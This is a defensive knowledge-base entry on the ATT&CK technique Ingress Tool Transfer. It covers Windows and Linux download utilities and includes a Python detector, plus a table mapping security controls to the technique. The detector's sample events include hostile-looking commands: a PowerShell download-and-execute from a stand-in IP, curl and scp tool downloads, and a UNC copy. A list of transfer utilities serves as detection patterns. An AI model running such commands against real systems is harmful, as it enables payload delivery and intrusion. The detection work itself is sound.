Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as FTP. Once present, adversaries may also transfer or spread tools between victim devices within the compromised environment (i.e., Lateral Tool Transfer).
Files can also be transferred using various Web Services as well as native or otherwise present tools on the victim system.(Citation: PTSecurity Cobalt Dec 2016)
On Windows, adversaries may use various utilities to download tools, such as <code>copy</code>, <code>finger</code>, and PowerShell commands such as <code>IEX(New-Object Net.WebClient).downloadString()</code> and <code>Invoke-WebRequest</code>. On Linux and macOS systems, a variety of utilities also exist, such as <code>curl</code>, <code>scp</code>, <code>sftp</code>, <code>tftp</code>, <code>rsync</code>, <code>finger</code>, and <code>wget</code>.(Citation: t1105_lolbas)
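A detection check for the transfer utilities named above, added here as an example (it is not ATT&CK's or any vendor's code): it scans constructed process-creation events for those utilities, or the quoted PowerShell download primitives, reaching a remote source (URL, UNC share, or user@host:/path) and suppresses an assumed allowlist of internal file servers.

```python
import re

# Process-creation events constructed for this example (not real telemetry).
SAMPLE_EVENTS = [
    {"host": "ws01", "image": "powershell.exe",
     "cmdline": "powershell -nop -c IEX(New-Object Net.WebClient).downloadString('http://203.0.113.10/a.ps1')"},
    {"host": "ws01", "image": "curl.exe",
     "cmdline": "curl -o C:\\Users\\Public\\t.exe http://203.0.113.10/t.exe"},
    {"host": "srv02", "image": "scp", "cmdline": "scp deploy@198.51.100.7:/tmp/kit.tgz /tmp/kit.tgz"},
    {"host": "srv02", "image": "curl", "cmdline": "curl -s http://updates.example.internal/health"},
    {"host": "ws03", "image": "cmd.exe",
     "cmdline": "cmd.exe /c copy \\\\203.0.113.10\\share\\tool.exe C:\\temp\\tool.exe"},
    {"host": "ws04", "image": "notepad.exe", "cmdline": "notepad.exe readme.txt"},
]

# Utilities named on this page that can pull a file from another system.
TRANSFER_UTILS = {"copy", "finger", "curl", "scp", "sftp", "tftp", "rsync", "wget", "powershell"}
# PowerShell download primitives quoted on this page.
PS_DOWNLOAD = re.compile(r"Net\.WebClient|downloadString|Invoke-WebRequest", re.IGNORECASE)
# Where a remote source shows up in a command line: URL, UNC share, or [user@]host:/path.
REMOTE_SOURCE = re.compile(
    r"\b(?:https?|ftp|tftp)://(?P<urlhost>[^/\s'\"]+)"
    r"|\\\\(?P<unchost>[^\\\s]+)\\"
    r"|\b(?:\w+@)?(?P<sshhost>[\w.-]*\.[\w-]+):/",
    re.IGNORECASE,
)
# Internal servers expected to hand out files (assumed allowlist for the example).
ALLOWED_HOSTS = {"updates.example.internal"}


def remote_host(cmdline):
    """Return the remote host a command line pulls from, or None if it is local only."""
    m = REMOTE_SOURCE.search(cmdline)
    if not m:
        return None
    return (m.group("urlhost") or m.group("unchost") or m.group("sshhost")).lower()


def detect_ingress_transfers(events, allowed_hosts=ALLOWED_HOSTS):
    """Flag events where a transfer utility (by image or any token) reaches a non-allowlisted host."""
    findings = []
    for ev in events:
        cmd = ev["cmdline"]
        names = {t.lower().removesuffix(".exe") for t in [ev["image"], *cmd.split()]}
        used = sorted(names & TRANSFER_UTILS)
        if not used and not PS_DOWNLOAD.search(cmd):
            continue
        host = remote_host(cmd)
        if host is None or host in allowed_hosts:
            continue  # local copy or sanctioned source; not an ingress transfer
        findings.append({"host": ev["host"], "utility": used[0] if used else "powershell", "remote": host})
    return findings
```

Command-line matching alone is a starting point; pairing it with the network telemetry the SC-7 and SI-4 mappings below call for (outbound connections from the same process) reduces both misses and noise.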
Capability ID | Capability Description | Mapping Type | ATT&CK ID | ATT&CK Name |
---|---|---|---|---|
AC-4 | Information Flow Enforcement | Protects | T1105 | Ingress Tool Transfer |
CA-7 | Continuous Monitoring | Protects | T1105 | Ingress Tool Transfer |
CM-2 | Baseline Configuration | Protects | T1105 | Ingress Tool Transfer |
CM-6 | Configuration Settings | Protects | T1105 | Ingress Tool Transfer |
CM-7 | Least Functionality | Protects | T1105 | Ingress Tool Transfer |
SC-7 | Boundary Protection | Protects | T1105 | Ingress Tool Transfer |
SI-3 | Malicious Code Protection | Protects | T1105 | Ingress Tool Transfer |
SI-4 | System Monitoring | Protects | T1105 | Ingress Tool Transfer |
action.hacking.variety.Unknown | Unknown | related-to | T1105 | Ingress Tool Transfer |
action.hacking.vector.Other network service | Network service that is not remote access or a web application. | related-to | T1105 | Ingress Tool Transfer |